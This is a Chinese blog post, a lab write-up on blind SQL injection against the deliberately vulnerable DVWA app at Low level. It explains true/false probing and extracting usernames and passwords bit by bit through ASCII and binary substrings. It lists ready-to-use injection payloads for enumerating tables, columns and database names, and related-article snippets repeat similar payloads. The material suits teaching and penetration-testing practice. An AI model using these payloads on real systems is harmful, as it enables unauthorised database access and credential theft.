DVWA低级别下的SQL盲注

最新推荐文章于 2024-04-26 13:53:30 发布
最新推荐文章于 2024-04-26 13:53:30 发布
阅读量989 收藏 1
点赞数
文章标签: sql 数据库 网络安全 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_23667585/article/details/127694579
版权

一、环境

靶机:Metasploitable2
靶场:DVWA
靶场等级:Low
靶场类型:SQL Injection (Blind)

二、SQL查询语句

SELECT first_name, last_name FROM users WHERE user_id = '$id';

三、简单注入测试

盲注:页面不显⽰数据库报错信息,只显⽰通⽤错误提⽰,sql注⼊将⽆法依据报错信息获得注⼊语句的执⾏结果。即 盲。

首先进行正常输入,看下功能的实现:

  1. 正常输入为真的页面返回:在这里插入图片描述
  2. 正常输入为假的返回页面:
    在这里插入图片描述
    之后使用简单的语句进行注入测试:
'
1'#
  1. 使用单引号进行注入测试:
    在这里插入图片描述
  2. 使用 1’ # 进行注入测试:
    在这里插入图片描述

四、绕过思路

因为⽆法基于报错信息判断结果,而通过页面返回结果可以得出结果为真和假的返回页面,我们就假设他返回的真的页面为1,假的页面为0,然后基于逻辑真假的不同结果来判断:

1' and 1=1#
1' and 1=2#
  1. 构造返回结果为真的sql注入语句:
    在这里插入图片描述
  2. 构造返回结果为假的sql注入语句:
    在这里插入图片描述
    可以看到我们的sql注入语句成功的被目标服务器执行了,接下来就可以构造Payload了。接下来的第五部分我会以一个关键的SQL语句来介绍,其他部分盲注语句我会放在第六部分,不做讲解,大家自己思考然后上机。

五、二进制方式猜解用户名和密码

思路:查询用户名或密码的第一位的ascii码的二进制的第一个字符,之后循环获取直至全0即可。
下面以获取用户名来给大家举个栗子,密码的语句我放倒了第六部分,需要先猜表名字段名,下面三条语句实现的效果是一样的,这里我仅以第三条语句来给大家讲解

1' and SUBSTRING(BIN(ASCII(SUBSTRING(USER(),1,1))),6,1)>0#

0' or SUBSTRING(BIN(ASCII(SUBSTRING(USER(),1,1))),6,1)>0#

0' or SUBSTRING(BIN(ASCII(SUBSTRING((select user from users limit 0,1),3,1))),6,1)>0#

对于这条语句,我们需要从最内层的函数看起

select user from users limit 0,1;

在这里插入图片描述
该语句的作用是:查询users表中的user字段的内容,仅返回第一条查询结果。

substring((select user from users limit 0,1),1,1);

在这里插入图片描述
该语句的作用是:获取用户名的第一个字符

ascii(substring((select user from users limit 0,1),1,1));

在这里插入图片描述
该语句的作用是:获取用户名的第一个字符的ASCII码

bin(ascii(substring((select user from users limit 0,1),1,1)));

在这里插入图片描述
该语句的作用是:获取用户名的第一个字符的ASCII码的二进制

SUBSTRING(BIN(ASCII(SUBSTRING((select user from users limit 0,1),3,1))),1,1)

在这里插入图片描述
该语句的作用是:获取用户名的第一个字符的ASCII码的二进制的第一个字符
此时我们可以通过循环上述语句来获取完整的用户名。

0' or SUBSTRING(BIN(ASCII(SUBSTRING((select user from users limit 0,1),3,1))),6,1)>0#

该语句中最前面的0' or以及最后面的>0#的作用我们可以将其拼接到SQL查询语句中进行分析:

SELECT first_name, last_name FROM users WHERE user_id = '0' or SUBSTRING(BIN(ASCII(SUBSTRING((select user from users limit 0,1),3,1))),6,1)>0#;

可以看到0 or以及>的意思是将最前面的查询语句的返回结果设置为假,因为我们需要通过二进制的方式来获取返回结果,所以我们需要一个逻辑值,并且让我们的SQL语句执行结果不被前一个查询条件所影响从而永真,所以使用or,一旦我们的查询条件返回为1,则为真,为0则为假。当然也可以使用and,上面也给出了使用and的语句。
至于#符号,他在本语句中起到一个闭合的作用,将查询语句中我不需要的可能会导致出错的后面所有内容全部注释掉。

六、其他盲注语句(思考后上机)

# 猜列数
0' union select 1,2#

# 猜函数名
0' union select null,CONCAT_WS(CHAR(32,58,32),user(),database(),version())#

# 猜是否存在table_name列、infomation_schema.tables表
1' and 1=0 union select null,table_name from information_schema.tables#
0' union select null,table_name from information_schema.tables#

# 猜是否存在users表
1' and 1=0 union select null,table_name from information_schema.columns where table_na
me='users'#
0' union select null,table_name from information_schema.columns where table_name='user
s'#

# 当没有权限读取information_schema库 或 拒绝union order by时,可以使用如下方进行判断:
1. 猜列名:
	1' and user is not null#(user就是你要判断的目标当前SQL查询语句所查询的数据库中的表中的字段)
	0' or user is not null#
3. 猜当前表表名:1' and users.user is not null#

猜字段内容:1' and user='admin'
0' or user like '%a%%d%'

# 猜数据库名称
1' and ASCII(SUBSTRING(Database(),1,1))=100#
1' and SUBSTR(BIN(ASCII(Substr(Database(),1,1))),1,1)=1#
(0-8 通常只关注1-7)

# 通过二进制获取密码
0' or substring(bin(ascii(substring((select password from users limit 0,1),1,1))),1,1)>0#

# 猜数据库名字长度
1and length(database())=4#

# 猜数据库名字
1and ascii(substr(database(),1,1))>97#

# 猜DVWA数据库中表的个数
1and (select count(table_name) from information_schema.tables where table_schema=database())=2#

七、请参考其他CSDN文章

娄不夜
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
DVWA——SQL盲注(全等级)
@一只躺平的猪@的博客
07-13 5380
SQL盲注与一般注入的区别在于:一般的注入攻击者可以直接从页面上看到注入语句的执行结果,而盲注时攻击者通常是无法从显示页面上获取执行结果,甚至连注入语句是否执行都无从得知。一般有两种方式:布尔型和时间型。还有一种是报错注入,本章主要介绍布尔盲注。布尔型是根据页面是否正确显示来判断我们构造的语句是否正确执行时间型则是根据页面加载时间是否变化来判断的。SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。具体来说,它是利用现有应用程序,将(
DVWA------SQL Injection (Blind)(SQL盲注
m0_65712192的博客
12-09 2650
DVWA------SQL Injection (Blind)(SQL盲注
DVWA靶场SQL注入通关详解(1),2024年最新赶紧学起来
weixin_58134620的博客
04-17 767
接下来查询表名,查询语句为:1 union select 1,table_name from information_schema.tables where table_schema=database()#。通常,SQL注入攻击的目标是Web应用程序,因为Web应用程序通常需要与数据库进行交互,并且大多数Web应用程序使用的是SQL语言。接下来判断字段数,当查询语句为1 or 1=1 order by 2时,页面能正常显示,但是当把2换成3时,页面就会报错,因此这里的字段数为2。没有进行敏感字符过滤。
sqli靶场练习第五关
weixin_48042647的博客
04-26 959
sqli-labs靶场第五关-盲注详解 现在一般情况下,大多数的网站都不会将错误回显出来,这时候我们是不知道有注入点,以及得到相关信息的。这个时候就需要我们判断是否存在注入,若存在注入那么这时候就需要采取盲注的方式来获得数据。 盲注又分为Boolean盲注和时间型盲注,本关要讲的是Boolean盲注。 Boolean盲注是基于真假的判断,它有几种判断方式: 通过长度判断:length():length(database())>=x 通过字符判断:substr():substr(database(),1
DVWA靶场-SQL Injection (Blind)SQL注入盲注
mlws1900的博客
03-19 1290
直接使用报错:' union select 1,count(*),concat('/',(select @@datadir),'/',floor(rand(0)*2))a from information_schema.columns group by a--+盲注,与一般注入的区别在于,一般的注入攻击者可以直接从页面上看到注入语句的执行结果,而盲注时攻击者通常是无法从显示页面上获取执行结果,甚至连注入语句是否执行都无从得知,因此盲注的难度要比一般注入高。length:正整数,指定将从左边返回的字符数。
2024年网络安全山东省赛-SMB信息收集解析(中职组)_使用访问工具对服务器服务访问,将服务器中管理员桌面的文本文档里的内容作为 flag
最新发布
2401_84252281的博客
04-26 613
任务环境说明:服务器场景:Server1。
DVWA-SQL盲注脚本(全)
10-04
DVWA SQL盲注,Low,Medium,High 三个级别的bool盲注脚本,比较完整,配套解释 : https://blog.csdn.net/csdn_Pade/article/details/82886765
SQL盲注medium.pdf
05-13
本文档主要讲解SQL盲注的技术,使用DVWA Security平台进行演示,难度设置为medium。下面我们将对每一步操作进行详细的解释和知识点总结。 一、DVWA Security平台的使用 DVWA Security是一个开源的Web应用安全测试...
网络安全原理与应用:SQL盲注.pptx
05-16
掌握在DVWA平台上进行SQL盲注的方法; SQL盲注 一、SQL盲注 SQL盲注,与一般注入的区别在于,一般的注入攻击者可以直接从页面上看到注入语句的执行结果,而盲注时攻击者通常是无法从显示页面上获取执行结果,甚至连...
DVWA下的SQL注入
07-25
SQL
DVWA下的SQL Injection(Blind)
07-25
盲注
dvwa靶场SQL注入(low等级)
Y_KolaFish_Y的博客
12-20 1130
dvwa靶场SQL注入(low等级) 第一步(判断是否可以注入) 1’ and 1=1#(正常回显) 1’ and 1=2#(无回显) 1’ or 1=1#(该表下所有数据项回显) 以上几步骤基本判断有sql注入漏洞 'union select table_schema ,table_name from information_schema.tables where table_sche...
7、DVWA——SQL盲注
qq_55202378的博客
09-13 447
dvwa SQL盲注
DVWAsql注入漏洞-low
m0_63735735的博客
07-19 1620
DVWAsql注入漏洞-low
dvwa----sql盲注low级
qq_45487671的博客
05-28 1116
实验4 SQL盲注 1.实验目的 (1)理解SQL盲注(布尔盲注、时间盲注、报错盲注)的原理; (2)学习手工盲注的过程; (3)了解SQL注入的防御技术。 2.实验要求 登陆DVWA平台,结合所学SQL盲注的基本知识,爆出当前使用数据库名称、数据表名称、字段名称、以及关键的字段值(比如用户名、密码等)。关键位置截图。 3.实验过程描述 服务器端源代码 low级别,查看源代码,文本框提交为get请求方式,为佳任何输入过滤限制 同时SQL语句查询返回的结果只有两种, `User ID exists in
渗透测试实验_基于DVWASQL盲注 安全等级Low Medium High
weixin_47133613的博客
03-20 5601
文章目录SQL盲注1. SQL盲注概述2. 基于布尔值的盲注3. 前期实验准备4. Low等级5. Medium等级6. High等级 SQL盲注 1. SQL盲注概述 以下内容引用自《SQL盲注(原理概述、分类)》 盲注: 即在SQL注入过程中,SQL语句执行查询后,查询数据不能回显到前端页面中,我们需要使用一些特殊的方式来判断或尝试,这个过程成为盲注 如果数据库运行返回结果时只反馈对错不会返回数据库中的信息 此时可以采用逻辑判断是否正确的盲注来获取信息。 盲注是不能通过直接显示的途径来获取数
DVWA-SQL盲注 medium
IWANnaaa的博客
04-03 384
DVWA-MASTER SQL盲注medium
DVWA靶场
nidaxin的博客
01-29 2674
1.sql注入一般流程: 1)判断注入点:即判断是否存在sql注入,通常在参数后面加单引号,万能密码 2)判断查询的字段数 :order by 数字(数字从小到大,看是否报错) 3)确定回显位 4)获取信息函数: user() 获取当前用户用户 database() 获取当前数据库 version() 获取数据库版本 5)获取数据库名:1’ union select version(),database()# 6)获取表名: 1‘union select 1,table_name fro
DVWA(sql注入 盲注)
weixin_44023403的博客
12-20 446
sql注入(盲注SQL Injection(盲注)LowMediumHigh SQL Injection(盲注SQL盲注,其实和SQL注入差不多,只是比它难一点利用,注入时返回的数据只有正确和错误,不会返回其他信息。 基于布尔的盲注 可通过构造真or假判断条件(数据库各项信息取值的大小比较,如:字段长度、版本数值、字段名、字段名各组成部分在不同位置对应的字符ASCII码…),将构造的sql语句提交到服务器,然后根据服务器对不同的请求返回不同的页面结果(True、False);然后不断调整判断条件中
dvwa靶场sql盲注
08-15
靶场SQL盲注是指在DVWA(Damn Vulnerable Web Application)这个靶场中进行的SQL注入攻击。靶场中有一个名为dvwa数据库,我们可以通过一系列的注入语句来探测这个数据库中的表的数量和表名的长度。 首先,通过布尔盲注的方式,我们可以使用一些条件语句来判断表的数量。比如,我们可以使用以下语句来判断表的数量是否为1: ```sql 1' and (select count(table_name) from information_schema.tables where table_schema=database())=1# ``` 如果返回结果为真,则说明表的数量为1。同样地,我们可以使用以下语句来判断表的数量是否大于2: ```sql 1' and (select count(table_name) from information_schema.tables where table_schema=database())>2# ``` 如果返回结果为假,则说明表的数量大于2。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* [DVWA——SQL盲注(全等级)](https://blog.csdn.net/qq_45833260/article/details/125762606)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *3* [DVWAsql注入——盲注](https://blog.csdn.net/Williamanddog/article/details/128404430)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

娄不夜

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值